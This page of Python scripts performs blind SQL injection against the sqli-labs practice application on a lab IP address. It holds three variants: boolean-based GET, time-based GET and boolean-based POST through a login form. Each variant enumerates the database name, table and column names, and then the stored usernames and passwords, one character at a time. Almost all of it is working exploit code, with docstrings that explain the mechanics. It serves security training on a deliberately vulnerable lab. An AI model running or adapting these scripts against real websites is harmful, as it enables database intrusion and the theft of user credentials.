IE安全(盲注py腳本)

GET布爾盲注

import requests
import time
import datetime
   # 獲取數據庫名長度
def database_len():
       """Infer the length of the current database name (boolean-based blind SQLi, Less-8).

       One GET per candidate length i in 1..9: the predicate
       ``length(database())>i`` is appended to the ``id`` parameter and
       ``%23`` (``#``) is added so the remainder of the server-side query is
       commented out. The page's normal text 'You are in' is the truth
       oracle; the first i for which it disappears (i.e. length is not
       greater than i) is printed as the length and the loop stops.
       If every probe keeps the text, nothing is printed.

       Defensive note: the probing leaves a run of near-identical requests
       from one client that differ only in the trailing integer - the
       typical access-log signature of blind-injection enumeration.

       Side effects: prints to stdout, sends HTTP requests. Returns None.
       """
       for i in range(1, 10):
           url = '''http://10.211.55.7/sqli-labs-master/Less-8/'''
           payload = '''?id=1' and length(database())>%s''' % i
           # print(url+payload+'%23')
           r = requests.get(url + payload + '%23')
           # Oracle: a false predicate removes the page's normal text.
           if 'You are in' not in r.text:
              #print(i)

           #else:
              print('database_length:', i)
              break
  
  
# Module-level call: runs as soon as this script executes (not guarded by
# ``if __name__ == "__main__"``). Note that this page concatenates three
# separate scripts, and the same function names are redefined further down.
database_len()
  
  #獲取數據庫名
def database_name():
     """Recover the current database name one character at a time (boolean-based, Less-8).

     For each position j in 1..8 every candidate in the alphabet (digits,
     upper- and lowercase ASCII letters) is tried with the predicate
     ``substr(database(),j,1)='c'``. The first candidate that keeps
     'You are in' on the page is appended to ``name`` and the inner loop
     breaks; a position with no match contributes nothing to ``name``.

     Side effects: prints the recovered name to stdout, sends one HTTP
     request per candidate tried. Returns None.
     """
     name = ''
     for j in range(1, 9):
         for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr(database(),%d,1)='%s'" % (
                 j, i)
             # print(url+'%23')
             r = requests.get(url + '%23')
             # Truth oracle: the normal page text survives only when the predicate holds.
             if 'You are in' in r.text:
                 name = name + i

                 # print(name)

                 break
     print('database_name:', name)
 
 
# Module-level call; performs the full character-by-character probing loop.
database_name()
 
 # 獲取數據庫表
def tables_name():
     """Recover the comma-separated table list of the current schema (boolean-based, Less-8).

     Probes positions 1..29 of ``group_concat(table_name)`` taken from
     ``information_schema.tables`` filtered on ``table_schema=database()``.
     At each position the lowercase letters and ',' are tried in order; the
     first candidate that keeps 'You are in' on the page is appended to
     ``name``. At most 29 characters are read.

     Side effects: prints the result to stdout, sends HTTP requests.
     Returns None.
     """
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" % (
                 j, i) 
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                 name = name + i

                 # print(name)

                 break
     print('table_name:', name)
 
 
# Module-level call; enumerates the table list of the current schema.
tables_name()
 
 
 # 獲取表中字段
def columns_name():
     """Recover the comma-separated column list of the ``users`` table (boolean-based, Less-8).

     Same scheme as ``tables_name``: positions 1..29 of
     ``group_concat(column_name)`` from ``information_schema.columns``
     restricted to ``table_schema=database()`` and ``table_name='users'``,
     with lowercase letters and ',' as candidates. The table name is
     hard-coded rather than taken from the previous step's output.

     Side effects: prints the result to stdout, sends HTTP requests.
     Returns None.
     """
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" % (
                 j, i)
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                 name = name + i

                 # print(name)

                 break
     print('column_name:', name)
 

# Module-level call; enumerates the column list of the hard-coded ``users`` table.
columns_name()
 
 
 # 獲取username
def username_value():
     """Recover the comma-separated ``username`` values of ``users`` (boolean-based, Less-8).

     Probes positions 1..99 of ``group_concat(username)`` with digits,
     lowercase letters and ',', '_', '-' as candidates; the first candidate
     per position that keeps 'You are in' on the page is appended to
     ``name``.

     Side effects: prints the result to stdout, sends HTTP requests.
     Returns None.
     """
     name = ''
     for j in range(1, 100):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" % (
                 j, i)
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                name = name + i

                # print(name)

                break
     print('username_value:', name)
 
 
# Module-level call; reads the concatenated username column.
username_value()
 
 
 # 獲取password
def password_value():
     """Recover the comma-separated ``password`` values of ``users`` (boolean-based, Less-8).

     Identical to ``username_value`` except that the subquery reads
     ``group_concat(password)``. Positions 1..99, candidates are digits,
     lowercase letters and ',', '_', '-'.

     Side effects: prints the result to stdout, sends HTTP requests.
     Returns None.
     """
     name = ''
     for j in range(1, 100):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" % (
                 j, i)
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                 name = name + i

                 # print(name)

                 break
     print('password_value:', name)
 
 
# Module-level call; last step of the boolean-based GET script.
password_value()

GET時間盲注

import datetime
import requests
import time
  
  # 獲取數據庫名長度
def database_len():
     """Infer the database-name length via time-based blind SQLi (Less-10).

     For i in 1..9 the injected ``if(length(database())>i,sleep(1),0)``
     makes the server pause one second while the predicate holds. The
     elapsed wall-clock time of each GET is measured with
     ``datetime.datetime.now()``; the loop stops at the first i whose
     response came back in under a second and prints that i as the length
     (if no probe returns quickly, i is 9 after the loop). Both branches
     print i, so every probed value is echoed.

     Defensive note: each true probe costs the server a full second of
     ``sleep()``, which shows up as a run of slow responses for a single
     client in the access and slow-query logs.

     Side effects: prints to stdout, sends HTTP requests. Returns None.
     """
     for i in range(1, 10):
         url = '''http://10.211.55.7/sqli-labs-master/Less-10/'''
         payload = '''?id=1" and if(length(database())>%s,sleep(1),0)''' % i
         # print(url+payload+'%23')
         time1 = datetime.datetime.now()
         r = requests.get(url + payload + '%23')
         time2 = datetime.datetime.now()
         # .seconds is the whole-second part of the delta (microseconds dropped),
         # so a response that took 0.99 s counts as "no delay".
         sec = (time2 - time1).seconds
         if sec >= 1:
             print(i)
         else:
             print(i)
             break
     print('database_len:', i)
 
# Module-level call; first step of the time-based GET script.
database_len()

    # 獲取數據庫名
def database_name():
     """Recover the current database name one character at a time (time-based, Less-9).

     For positions 1..8 and each candidate in the alphabet (digits, upper-
     and lowercase ASCII letters) the predicate
     ``substr(database(),j,1)='c'`` is wrapped in ``if(...,sleep(1),1)``.
     A response that took at least one whole second (``timedelta.seconds``)
     is taken as "true": the candidate is appended to ``name`` and the
     inner loop breaks.

     Side effects: prints the recovered name to stdout, sends HTTP
     requests. Returns None.
     """
     name = ''
     for j in range(1, 9):
         for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
             url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
             payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
             # print(url+payload+'%23')
             time1 = datetime.datetime.now()
             r = requests.get(url + payload + '%23')
             time2 = datetime.datetime.now()
             # Whole seconds only; sub-second network latency alone never counts as a hit.
             sec = (time2 - time1).seconds
             if sec >= 1:
                 name += i
                 # print(name)
                 break
     print('database_name:', name)
 
 
# Module-level call; performs the timing-based character probing loop.
database_name()

  # 獲取數據庫表

def table_name():
     """Recover the comma-separated table list of the current schema (time-based, Less-9).

     Positions 1..29 of ``group_concat(table_name)`` from
     ``information_schema.tables`` (``table_schema=database()``) are probed
     with lowercase letters and ','; a response delayed by at least one
     whole second marks the candidate as correct.

     Side effects: prints the result to stdout, sends HTTP requests.
     Returns None.
     """
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
             payload = '''?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
             # print(url+payload+'%23')
             time1 = datetime.datetime.now()
             r = requests.get(url + payload + '%23')
             time2 = datetime.datetime.now()
             sec = (time2 - time1).seconds
             if sec >= 1:
                 name += i
                 # print(name)
                 break
     print('table_name:', name)
 
 
# Module-level call; enumerates the table list via response timing.
table_name()

# 獲取表中字段
def column_name():
    """Recover the comma-separated column list of the ``users`` table (time-based, Less-9).

    Same scheme as ``table_name`` but over ``group_concat(column_name)``
    from ``information_schema.columns`` restricted to
    ``table_schema=database()`` and the hard-coded ``table_name='users'``.

    Side effects: prints the result to stdout, sends HTTP requests.
    Returns None.
    """
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
            payload = '''?id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
            time1 = datetime.datetime.now()
            r = requests.get(url+payload+'%23')
            time2 = datetime.datetime.now()
            sec = (time2-time1).seconds
            if sec >=1:
                name += i
                # print(name)
                break
    print('column_name:',name)
# Module-level call; enumerates the column list of the hard-coded ``users`` table.
column_name()


# 獲取username
def username_value():
    """Recover the comma-separated ``username`` values of ``users`` (time-based, Less-9).

    Positions 1..99 of ``group_concat(username)`` are probed with digits,
    lowercase letters and ',', '_', '-'; a response delayed by at least one
    whole second accepts the candidate.

    Side effects: prints the result to stdout, sends HTTP requests.
    Returns None.
    """
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
            payload = '''?id=1' and if(substr((select group_concat(username) from users ),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
            time1 = datetime.datetime.now()
            r = requests.get(url+payload+'%23')
            time2 = datetime.datetime.now()
            sec = (time2-time1).seconds
            if sec >=1:
                name += i
                # print(name)
                break
    print('username_value:',name)
# Module-level call; reads the concatenated username column via timing.
username_value()

# 獲取password
def password_value():
    """Recover the comma-separated ``password`` values of ``users`` (time-based, Less-9).

    Identical to ``username_value`` except that the subquery reads
    ``group_concat(password)``.

    Side effects: prints the result to stdout, sends HTTP requests.
    Returns None.
    """
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
            payload = '''?id=1' and if(substr((select group_concat(password) from users ),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
            time1 = datetime.datetime.now()
            r = requests.get(url+payload+'%23')
            time2 = datetime.datetime.now()
            sec = (time2-time1).seconds
            if sec >=1:
                name += i
                # print(name)
                break
    print('password_value:',name)
# Module-level call; last step of the time-based GET script.
password_value()

POST布爾盲注

import requests
   
   # 獲取數據庫名長度
def database_len():
       """Infer the database-name length via boolean-based blind SQLi over a POST login form (Less-16).

       The predicate ``length(database())>i`` (i in 1..9) is sent in the
       ``uname`` form field; the payload starts with ``admin")`` and ends
       with ``#`` - presumably closing the quoting around the username in
       the server-side query and commenting out the rest (not verifiable
       from this script). ``passwd`` is a fixed dummy value. The
       login-success image name 'flag.jpg' in the response is the truth
       oracle: while it is present i is echoed; the first i without it is
       printed as the length and the loop ends.

       Side effects: prints to stdout, sends HTTP POST requests. Returns None.
       """
       for i in range(1, 10):
           url = '''http://10.211.55.7/sqli-labs-master/Less-16/'''
           payload = '''admin") and length(database())>%s #''' % i
           data = {'uname':payload,'passwd':'admin'}
           # print(url+payload+'%23')
           r = requests.post(url, data)
           # Oracle: the success image is served only while the predicate holds.
           if 'flag.jpg'  in r.text:
              print(i)

           else:
              print('database_length:', i)
              break 
# Module-level call; first step of the POST-based script.
database_len()

 #獲取數據庫名
def database_name():
     """Recover the current database name one character at a time (boolean-based POST, Less-16).

     For positions 1..8 each candidate (digits, upper- and lowercase ASCII
     letters) is sent in the ``uname`` field as
     ``admin' and substr(database(),j,1)='c' #`` together with a dummy
     ``passwd``; the first candidate whose response contains 'flag.jpg'
     is appended to ``name`` and the inner loop breaks.

     Side effects: prints the recovered name to stdout, sends HTTP POST
     requests. Returns None.
     """
     name = ''
     for j in range(1, 9):
         for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
             url = '''http://10.211.55.7/sqli-labs-master/Less-16/'''
             payload = "admin' and substr(database(),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             # Truth oracle: login-success image present only when the predicate holds.
             if 'flag.jpg'  in r.text:
                 name = name + i

                 # print(name)

                 break
     print('database_name:', name)
# Module-level call; performs the character probing loop over the login form.
database_name()

 #獲取數據庫表
def table_name():
     """Recover the comma-separated table list of the current schema (boolean-based POST, Less-15).

     Positions 1..29 of ``group_concat(table_name)`` from
     ``information_schema.tables`` (``table_schema=database()``) are probed
     with lowercase letters and ','; 'flag.jpg' in the response accepts the
     candidate.

     Side effects: prints the result to stdout, sends HTTP POST requests.
     Returns None.
     """
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
             payload = "admin' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i

                 # print(name)

                 break
     print('table_name:', name)
# Module-level call; enumerates the table list over the login form.
table_name()

#獲取表中字段名
def column_name():
     """Recover the comma-separated column list of the ``users`` table (boolean-based POST, Less-15).

     Same scheme as ``table_name`` but over ``group_concat(column_name)``
     from ``information_schema.columns`` restricted to
     ``table_schema=database()`` and the hard-coded ``table_name='users'``.

     Side effects: prints the result to stdout, sends HTTP POST requests.
     Returns None.
     """
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
             payload = "admin' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i

                 # print(name)

                 break
     print('column_name:', name)
# Module-level call; enumerates the column list of the hard-coded ``users`` table.
column_name()

#獲取username
def username_value():
     """Recover the comma-separated ``username`` values of ``security.users`` (boolean-based POST, Less-15).

     Positions 1..99 of ``group_concat(username)`` are probed with digits,
     lowercase letters and ',', '_', '-'. Unlike the GET variants above,
     the table is schema-qualified as ``security.users``.

     Side effects: prints the result to stdout, sends HTTP POST requests.
     Returns None.
     """
     name = ''
     for j in range(1, 100):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
             url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
             payload = "admin' and substr((select group_concat(username) from security.users),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i

                 # print(name)

                 break
     print('username_value:', name)
# Module-level call; reads the concatenated username column over the login form.
username_value()

#獲取password
def password_value():
     """Recover the comma-separated ``password`` values of ``security.users`` (boolean-based POST, Less-15).

     Identical to ``username_value`` except that the subquery reads
     ``group_concat(password)``.

     Side effects: prints the result to stdout, sends HTTP POST requests.
     Returns None.
     """
     name = ''
     for j in range(1, 100):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
             url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
             payload = "admin' and substr((select group_concat(password) from security.users),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i

                 # print(name)

                 break
     print('password_value:', name)
# Module-level call; last step of the POST-based script.
password_value()